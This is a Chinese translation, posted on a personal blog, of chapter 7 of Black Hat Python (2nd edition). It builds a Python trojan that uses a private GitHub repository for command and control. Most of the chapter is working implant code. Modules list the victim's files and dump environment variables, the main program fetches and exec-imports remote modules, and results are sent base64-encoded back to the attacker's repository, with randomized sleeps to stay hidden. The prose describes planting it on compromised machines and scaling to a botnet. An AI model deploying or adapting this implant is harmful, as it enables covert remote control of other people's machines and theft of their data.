<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Black Hat Python 2nd 7 | Ma9icCR</title><meta name="description" content="GITHUB COMMAND AND CONTROL – GitHub 命令和控制假设你入侵了一台机器。现在，您希望它自动执行任务，并向您报告发现的情况。在这一章中，我们将创建一个 Trojan (特洛伊木马)框架，它在远程机器上看起来是无害的，但我们将能够为它分配各种作恶的任务。 创建一个可靠的特洛伊木马框架最具挑战性的一个方面是弄清楚如何控制、更新和接收来自植入程序的数据。至关重要的是，您需要"><meta name="keywords" content="Black_Hat_Python_2nd"><meta name="author" content="Ma9icCR"><meta name="copyright" content="Ma9icCR"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://ma9iccr.github.io/2021-07/Black-Hat-Python-2nd-7/"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//fonts.googleapis.com" crossorigin="crossorigin"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta property="og:type" content="article"><meta property="og:title" content="Black Hat Python 2nd 7"><meta property="og:url" content="https://ma9iccr.github.io/2021-07/Black-Hat-Python-2nd-7/"><meta property="og:site_name" content="Ma9icCR"><meta property="og:description" content="GITHUB COMMAND AND CONTROL – GitHub 命令和控制假设你入侵了一台机器。现在，您希望它自动执行任务，并向您报告发现的情况。在这一章中，我们将创建一个 Trojan (特洛伊木马)框架，它在远程机器上看起来是无害的，但我们将能够为它分配各种作恶的任务。 创建一个可靠的特洛伊木马框架最具挑战性的一个方面是弄清楚如何控制、更新和接收来自植入程序的数据。至关重要的是，您需要"><meta property="og:image" content="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg"><meta property="article:published_time" content="2021-07-08T12:09:37.000Z"><meta property="article:modified_time" content="2022-03-28T07:20:35.322Z"><meta name="twitter:card" content="summary"><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#000')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#fff')
  }
}

var getCookies = function (name) {
  const value = `; ${document.cookie}`
  const parts = value.split(`; ${name}=`)
  if (parts.length === 2) return parts.pop().split(';').shift()
}

var autoChangeMode = 'false'
var t = getCookies('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (Cookies.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="prev" title="Black Hat Python 2nd 8" href="https://ma9iccr.github.io/2021-07/Black-Hat-Python-2nd-8/"><link rel="next" title="Black Hat Python 2nd 6" href="https://ma9iccr.github.io/2021-07/Black-Hat-Python-2nd-6/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web&amp;display=swap"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  noticeOutdate: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: false,
  highlightCopy: true,
  highlightLang: true,
  isPhotoFigcaption: false,
  islazyload: true,
  isanchor: false    
}</script><script>var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2022-03-28 15:20:35'
}</script><noscript><style>
#nav {
  opacity: 1
}
.justified-gallery img{
  opacity: 1
}
</style></noscript><meta name="generator" content="Hexo 4.2.1"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">33</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">10</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">7</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down menus-expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li><li><a class="site-page" href="/images/"><i class="fa-fw fas fa-image"></i><span> Image</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/navigate/"><i class="fa-fw fas fa-navigate"></i><span> Navigate</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#GITHUB-COMMAND-AND-CONTROL-–-GitHub-命令和控制"><span class="toc-number">1.</span> <span class="toc-text">GITHUB COMMAND AND CONTROL – GitHub 命令和控制</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#设置-GitHub-帐户"><span class="toc-number">1.1.</span> <span class="toc-text">设置 GitHub 帐户</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#创建模块"><span class="toc-number">1.2.</span> <span class="toc-text">创建模块</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#配置特洛伊木马"><span class="toc-number">1.3.</span> <span class="toc-text">配置特洛伊木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#构建一个-GitHub-感知木马"><span class="toc-number">1.4.</span> <span class="toc-text">构建一个 GitHub 感知木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#导入Python的黑客攻击功能"><span class="toc-number">1.5.</span> <span class="toc-text">导入Python的黑客攻击功能</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Kicking-the-Tires"><span class="toc-number">1.5.1.</span> <span class="toc-text">Kicking the Tires</span></a></li></ol></li></ol></li></ol></div></div></div><div id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url(https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg)"><nav id="nav"><span class="pull-left" id="blog_name"><a class="blog_title" id="site-name" href="/">Ma9icCR</a></span><span class="pull-right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down menus-expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li><li><a class="site-page" href="/images/"><i class="fa-fw fas fa-image"></i><span> Image</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/navigate/"><i class="fa-fw fas fa-navigate"></i><span> Navigate</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><span class="toggle-menu close"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">Black Hat Python 2nd 7</div></div><div id="post-meta"><div class="meta-firstline"><time class="post-meta__date"><span class="post-meta__date-created" title="发表于 2021-07-08 20:09:37"><i class="far fa-calendar-alt fa-fw"></i> 发表于 2021-07-08</span><span class="post-meta__separator">|</span><span class="post-meta__date-updated" title="更新于 2022-03-28 15:20:35"><i class="fas fa-history fa-fw"></i> 更新于 2022-03-28</span></time><span class="post-meta__categories"><span class="post-meta__separator">|</span><i class="fas fa-inbox fa-fw post-meta__icon"></i><a class="post-meta__categories" href="/categories/books/">books</a></span></div><div class="meta-secondline"> </div><div class="meta-thirdline"><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta__icon"></i><span>阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="GITHUB-COMMAND-AND-CONTROL-–-GitHub-命令和控制"><a href="#GITHUB-COMMAND-AND-CONTROL-–-GitHub-命令和控制" class="headerlink" title="GITHUB COMMAND AND CONTROL – GitHub 命令和控制"></a>GITHUB COMMAND AND CONTROL – GitHub 命令和控制</h1><p>假设你入侵了一台机器。现在，您希望它自动执行任务，并向您报告发现的情况。在这一章中，我们将创建一个 Trojan (特洛伊木马)框架，它在远程机器上看起来是无害的，但我们将能够为它分配各种作恶的任务。</p>
<p>创建一个可靠的特洛伊木马框架最具挑战性的一个方面是弄清楚如何控制、更新和接收来自植入程序的数据。至关重要的是，您需要一种相对通用的方式将代码发送到远程特洛伊木马。首先，它的灵活性将允许您在每个系统上执行不同的任务。此外，有时您可能需要您的特洛伊木马选择性地运行针对某些目标操作系统的代码，而不是其他操作系统的代码。</p>
<p>尽管多年来黑客依靠 Internet Relay Chat (IRC 因特网中继聊天协议)甚至推特等技术设计了许多创造性的命令和控制方法，但我们将尝试一种实际上为代码设计的服务。我们将使用 GitHub 作为存储我们植入配置信息的一种方式，以及从受害者系统中泄露数据的一种手段。此外，我们将托管植入程序执行任务所需的任何模块到 GitHub 上。在设置这一切的时候，我们将黑掉 Python 的原生库导入机制，这样当你创建新的木马模块时，你的植入程序可以直接从你的 repo 中自动检索它们和任何依赖的库。</p>
<p>(笔者注： repo 这个词作为缩写有很多可能的意思，笔者结合 GitHub 猜测这里应该是指 repository ，即 GitHub 的仓库)</p>
<p>利用 GitHub 完成这些任务可能是一个聪明的策略:你到 GitHub 的流量将通过Secure Sockets Layer (SSL 安全套接字层)进行加密，我们这些作者看到，很少有企业主动限制 GitHub 本身。我们将使用私人 repo (仓库)，这样窥探者就看不到我们在做什么。一旦你把功能编码到木马中，理论上你可以把它转换成二进制文件，并把它放在一台脆弱的机器上，这样它就可以无限期地运行。然后，您可以使用 GitHub 存储仓库告诉它该做什么，并收集它已经发现的东西。</p>
<h2 id="设置-GitHub-帐户"><a href="#设置-GitHub-帐户" class="headerlink" title="设置 GitHub 帐户"></a>设置 GitHub 帐户</h2><p>如果你没有 GitHub 账户，去 <a href="https://github.com/" target="_blank" rel="noopener">https://github.com/</a> 注册一个，并创建一个名为 <em>bhptrojan</em> 的新存储库。接下来，安装 Python GitHub API 库( <a href="https://pypi.org/project/github3.py/" target="_blank" rel="noopener">https://pypi.org/project/github3.py/</a> )，以便您可以自动化与仓库的交互:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install github3.py</span><br></pre></td></tr></table></figure>

<p>现在让我们为我们的仓库创建一个基本结构。在命令行中输入以下内容:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ mkdir bhptrojan</span><br><span class="line">$ <span class="built_in">cd</span> bhptrojan</span><br><span class="line">$ git init</span><br><span class="line">$ mkdir modules</span><br><span class="line">$ mkdir config</span><br><span class="line">$ mkdir data</span><br><span class="line">$ touch .gitignore</span><br><span class="line">$ git add .</span><br><span class="line">$ git commit -m <span class="string">"Adds repo structure for trojan."</span></span><br><span class="line">$ git remote add origin https://github.com/&lt;yourusername&gt;/bhptrojan.git</span><br><span class="line">$ git push origin master</span><br></pre></td></tr></table></figure>

<p>现在，我们已经为存储库创建了初始结构。 <em>config</em> 目录保存每个特洛伊木马的唯一配置文件。因为在部署特洛伊木马时，您希望每个木马执行不同的任务，所以每个特洛伊木马将使用单独的配置文件。 <em>modules</em> 目录包含特洛伊木马应该获取并执行的所有模块化代码。我们将实现一个特殊的导入方式，让我们的木马直接从我们的 GitHub 存储库中导入需要的库。这种远程加载功能还允许您将第三方库隐藏在 GitHub 中，这样您就不必在每次想要添加新功能或依赖项时不断地重新编译您的特洛伊木马。 <em>data</em> 目录是特洛伊木马程序检查所有收集到的数据的地方。</p>
<p>您可以在 GitHub 站点上创建一个私人访问令牌，并在使用 API 对 HTTPS 执行 Git 操作时使用它来代替使用密码。令牌应该为我们的特洛伊木马提供读取和写入权限，因为它需要读取配置和写入输出。按照 GitHub 站点上的说明 ( <a href="https://docs.github.com/en/github/authenticating-to-github/" target="_blank" rel="noopener">https://docs.github.com/en/github/authenticating-to-github/</a> ) 创建令牌并将令牌字符串保存在本地文件中，将文件命名为 <em>mytoken.txt</em> 。 然后，将 <em>mytoken.txt</em> 添加到 .<em>gitignore</em> 文件，这样您就不会失误地将您的凭证发送到存储库。</p>
<p>现在让我们开始创建一些简单的模块和一个示例配置文件。</p>
<h2 id="创建模块"><a href="#创建模块" class="headerlink" title="创建模块"></a>创建模块</h2><p>在后面的章节中，您将与您的特洛伊木马做一些令人讨厌的事情，例如记录键盘敲击和屏幕截图。但是首先，让我们创建一些可以轻松测试和部署的简单模块。在 <em>modules</em> 目录中打开一个新文件，将其命名为 <em>dirlister.py</em> ，并输入以下代码:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(**args)</span>:</span></span><br><span class="line">    print(<span class="string">"[*] In dirlister module."</span>)</span><br><span class="line">    files = os.listdir(<span class="string">"."</span>)</span><br><span class="line">    <span class="keyword">return</span> str(files)</span><br></pre></td></tr></table></figure>

<p>这一小段代码定义了一个 <em>run</em> 函数，该函数可以列出当前目录中的所有文件，并将该文件列表以字符串形式返回。您开发的每个模块都应该设置一个带有可变数量参数的 <em>run</em> 函数。这使您能够以相同的方式加载每个模块，但仍然允许您自定义配置文件，以便根据需要向模块传递不同的参数。</p>
<p>现在让我们在名为 <em>environment.py</em> 的文件中创建另一个模块:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(**args)</span>:</span></span><br><span class="line">    print(<span class="string">"[*] In environment module."</span>)</span><br><span class="line">    <span class="keyword">return</span> os.environ</span><br></pre></td></tr></table></figure>

<p>这个模块只是检索在木马运行的远程机器上设置的所有环境变量。</p>
<p>现在让我们将这段代码发送到我们的 GitHub 仓库，这样我们的特洛伊木马就可以使用它了。在命令行中，从主存储库目录中输入以下代码:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ git add .</span><br><span class="line">$ git commit -m <span class="string">"Adds new modules"</span></span><br><span class="line">$ git push origin master</span><br><span class="line">Username: ********</span><br><span class="line">Password: ********</span><br></pre></td></tr></table></figure>

<p>您应该可以看到您的代码被放到了您的 GitHub 仓库；自由地登录您的帐户并仔细检查！这正是您将来继续开发代码的方式。我们将把更复杂模块的集成留给你，作为你的家庭作业。</p>
<p>如果需要评估您创建的任意模块，就请将它们推送到 GitHub ，然后在本地版本特洛伊木马的配置文件中启用它们。这样，在让您的远程特洛伊木马程序获取代码并使用它之前，您就可以在您控制的虚拟机(VM)或主机硬件上先测试它们。</p>
<h2 id="配置特洛伊木马"><a href="#配置特洛伊木马" class="headerlink" title="配置特洛伊木马"></a>配置特洛伊木马</h2><p>我们想让我们的特洛伊木马执行某些操作。这意味着我们需要一种方法来告诉它要执行什么操作，以及哪些模块负责执行这些操作。使用配置文件为我们提供了这种级别的控制。如果我们愿意的话，它还能让我们有效地让木马休眠(通过不给它任何任务)。为了让这个系统工作，您部署的每个特洛伊木马都应该有一个唯一的 ID 标识。这样，您将能够根据这些标识对任何检索到的数据进行分类，并控制哪些特洛伊木马执行某些任务。</p>
<p>我们将配置特洛伊木马程序，在 <em>config</em> 目录中查找 <em>TROJANID.json</em> ，它将返回一个简单的 JSON 文档，我们可以将其解析出来，转换为 Python 字典，然后使用它通知我们的特洛伊木马要执行哪些任务。 JSON 格式也使得更改配置选项变得很容易。进入你的 <em>config</em> 目录，创建一个名为 <em>abc.json</em> 的文件并写入以下内容:</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="attr">"module"</span> : <span class="string">"dirlister"</span></span><br><span class="line">    &#125;,</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="attr">"module"</span>  : <span class="string">"environment"</span></span><br><span class="line">    &#125;</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p>这就是远程木马应该运行的模块的一个简单列表。稍后，您将看到我们如何读取这个 JSON 文档，然后遍历每个选项来加载这些模块。</p>
<p>当您处理并动脑筋思考这些模块时，您可能会发现包含额外的配置选项很有用，例如执行持续时间、运行模块的次数或要传递给模块的参数。您还可以添加多种方法来泄露数据，正如我们在第9章中向您展示的那样。</p>
<p>进入命令行，在主存储库目录下运行以下命令:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ git add .</span><br><span class="line">$ git commit -m <span class="string">"Adds simple configuration."</span></span><br><span class="line">$ git push origin master</span><br><span class="line">Username: ********</span><br><span class="line">Password: ********</span><br></pre></td></tr></table></figure>

<p>现在您已经有了要运行的配置文件和一些简单的模块，让我们开始构建木马主要部分。</p>
<h2 id="构建一个-GitHub-感知木马"><a href="#构建一个-GitHub-感知木马" class="headerlink" title="构建一个 GitHub 感知木马"></a>构建一个 GitHub 感知木马</h2><p>木马主要部分将从 GitHub 检索配置选项和要运行的代码。让我们从编写连接和验证 GitHub API 的函数开始，然后与它进行通信。打开一个新文件命名为 <em>git_trojan.py</em> ，并输入以下内容: </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> github3</span><br><span class="line"><span class="keyword">import</span> importlib</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> datetime <span class="keyword">import</span> datetime</span><br></pre></td></tr></table></figure>

<p>这些简单的代码只包含必要的导入，这应该会使我们的总体木马规模在编译时相对较小。我们说 <em>relatively</em> (相对地)是因为大多数使用 pyinstaller 编译的 Python 二进制文件都在7MB左右。(可以在这里查看pyinstaller： <a href="https://www.pyinstaller.org/downloads.html" target="_blank" rel="noopener">https://www.pyinstaller.org/downloads.html</a> )。我们会把这个二进制文件放到脆弱的目标机器上。</p>
<p>如果你要利用这种技术来构建一个完整的 <em>botnet</em> (僵尸网络，一个由许多这样的植入物组成的网络)，你会想要自动生成木马、设置它们的ID、创建一个被推送到 GitHub 的配置文件，并将木马编译成可执行文件的能力。不过，我们今天不会建立僵尸网络；我们会利用你的想象力来完成这项工作。</p>
<p>现在让我们将 GitHub 相关的代码放在适当的位置:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">1</span>] <span class="function"><span class="keyword">def</span> <span class="title">github_connect</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">with</span> open(<span class="string">'mytoken.txt'</span>) <span class="keyword">as</span> f:</span><br><span class="line">        token = f.read()</span><br><span class="line">    user = <span class="string">'tiarno'</span></span><br><span class="line">    sess = github3.login(token=token)</span><br><span class="line">    <span class="keyword">return</span> sess.repository(user, <span class="string">'bhptrojan'</span>)</span><br><span class="line">[<span class="number">2</span>] <span class="function"><span class="keyword">def</span> <span class="title">get_file_contents</span><span class="params">(dirname, module_name, repo)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> repo.file_contents(<span class="string">f'<span class="subst">&#123;dirname&#125;</span>/<span class="subst">&#123;module_name&#125;</span>'</span>).content</span><br></pre></td></tr></table></figure>

<p>这两个函数处理与 GitHub 存储库的交互。<em>github_connect</em> 函数读取在 GitHub 上创建的令牌[1]。当您创建令牌时，您将它写到一个名为 <em>mytoken.txt</em> 的文件中。现在我们从该文件中读取令牌，并返回一个到 GitHub 存储库的连接。您可能希望为不同的特洛伊木马创建不同的令牌，以便控制每个特洛伊木马可以在您的存储库中访问的内容。这样，如果受害者发现了你的木马，他们也无法追踪并删除所有你检索到的数据。</p>
<p><em>get_file_contents</em> 函数获取目录名、模块名和存储库连接，并返回指定模块的内容[2]。该函数负责从远程存储库抓取文件并在本地读取内容。我们将使用它来读取配置选项和模块源代码。</p>
<p>现在，我们将创建一个 <em>Trojan</em> 类来执行基本的木马任务:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Trojan</span>:</span></span><br><span class="line">[<span class="number">1</span>] <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, id)</span>:</span></span><br><span class="line">        self.id = id</span><br><span class="line">        self.config_file = <span class="string">f'<span class="subst">&#123;id&#125;</span>.json'</span></span><br><span class="line">    [<span class="number">2</span>] self.data_path = <span class="string">f'data/<span class="subst">&#123;id&#125;</span>/'</span></span><br><span class="line">    [<span class="number">3</span>] self.repo = github_connect()</span><br></pre></td></tr></table></figure>

<p>当我们初始化 Trojan 对象时[1]，我们分配给它配置信息和特洛伊木马写入其输出文件的数据路径[2]，并且我们建立到存储库的连接[3]。现在，我们将添加与之通信所需的类函数:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">1</span>] <span class="function"><span class="keyword">def</span> <span class="title">get_config</span><span class="params">(self)</span>:</span></span><br><span class="line">        config_json = get_file_contents(</span><br><span class="line">                            <span class="string">'config'</span>, self.config_file, self.repo</span><br><span class="line">                            )</span><br><span class="line">        config = json.loads(base64.b64decode(config_json))</span><br><span class="line">        <span class="keyword">for</span> task <span class="keyword">in</span> config:</span><br><span class="line">            <span class="keyword">if</span> task[<span class="string">'module'</span>] <span class="keyword">not</span> <span class="keyword">in</span> sys.modules:</span><br><span class="line">            [<span class="number">2</span>] exec(<span class="string">"import %s"</span> % task[<span class="string">'module'</span>])</span><br><span class="line">        <span class="keyword">return</span> config</span><br><span class="line">[<span class="number">3</span>] <span class="function"><span class="keyword">def</span> <span class="title">module_runner</span><span class="params">(self, module)</span>:</span></span><br><span class="line">        result = sys.modules[module].run()</span><br><span class="line">        self.store_module_result(result)</span><br><span class="line">[<span class="number">4</span>] <span class="function"><span class="keyword">def</span> <span class="title">store_module_result</span><span class="params">(self, data)</span>:</span></span><br><span class="line">        message = datetime.now().isoformat()</span><br><span class="line">        remote_path = <span class="string">f'data/<span class="subst">&#123;self.id&#125;</span>/<span class="subst">&#123;message&#125;</span>.data'</span></span><br><span class="line">        bindata = bytes(<span class="string">'%r'</span> % data, <span class="string">'utf-8'</span>)</span><br><span class="line">        self.repo.create_file(</span><br><span class="line">                        remote_path, message, base64.b64encode(bindata)</span><br><span class="line">                        )</span><br><span class="line">[<span class="number">5</span>] <span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(self)</span>:</span></span><br><span class="line">        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">            config = self.get_config()</span><br><span class="line">            <span class="keyword">for</span> task <span class="keyword">in</span> config:</span><br><span class="line">                thread = threading.Thread(</span><br><span class="line">                    target=self.module_runner,</span><br><span class="line">                    args=(task[<span class="string">'module'</span>],))</span><br><span class="line">                thread.start()</span><br><span class="line">                time.sleep(random.randint(<span class="number">1</span>, <span class="number">10</span>))</span><br><span class="line">        [<span class="number">6</span>] time.sleep(random.randint(<span class="number">30</span>*<span class="number">60</span>, <span class="number">3</span>*<span class="number">60</span>*<span class="number">60</span>))</span><br></pre></td></tr></table></figure>

